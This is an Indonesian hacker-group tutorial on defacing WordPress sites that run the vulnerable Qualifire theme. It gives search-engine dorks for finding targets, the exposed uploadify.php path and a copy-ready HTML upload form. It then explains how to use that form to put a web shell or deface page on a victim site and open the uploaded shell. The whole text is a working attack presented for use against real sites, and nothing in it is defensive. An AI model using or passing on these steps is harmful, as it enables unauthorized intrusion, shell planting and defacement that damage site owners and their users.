WELCOME ANONYMOUS CYBER TEAM !!!
Kali Ini Saya Akan Memposting
===DEFACE DENGAN METHOD WP-QUALIFIER===
DORK
inurl:"/wp-content/themes/qualifire"
inurl:"/wp-content/themes/qualifire" site:.fr
( kembangin lagi ya drok nya jangan manja )
Kalo udh ketemu web nya
Masukin exploit
Exploit :
/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Contoh :
site.tamvan.id/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Vuln? biasanya Blank putih atau muncul angka/huruf gak jelas
,
tapi kalo 404 not found berarti ikhlasin aja hehehe
Script Upload CSRF:
NOTE :
<form
action="http://site.tamvan.id/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata"
><br>
<input type="submit" name="submit"
value="Submit">
</form>
|
* Save As: .html (contoh.html)
* edit/ganti site.tamvan.id ~> menjadi link target yang
sobat temukan
- Lalu buka .html yang sudah kalian save
- klik browser (pilih shell , pilih script deface , pilih
gambar , atau file txt)
*seterah kalian mau upload apa, tapi disini saya akan upload
file gambar (png, jpg, gift, dll)
BOOM success
Shell Akses:
http;//site.tamvan.id/namashell.php
karna saya upload gambar jadinya kek gitu:
http://site.tamvan.id/ hacked_zero_s .jpg
Sekian Tutorial Dari Saya
Mohon Maaf Kalau kurang jelas
Terima Kasih
Follow instagram
By : ZERO_S
Support : MR.Ten_Wap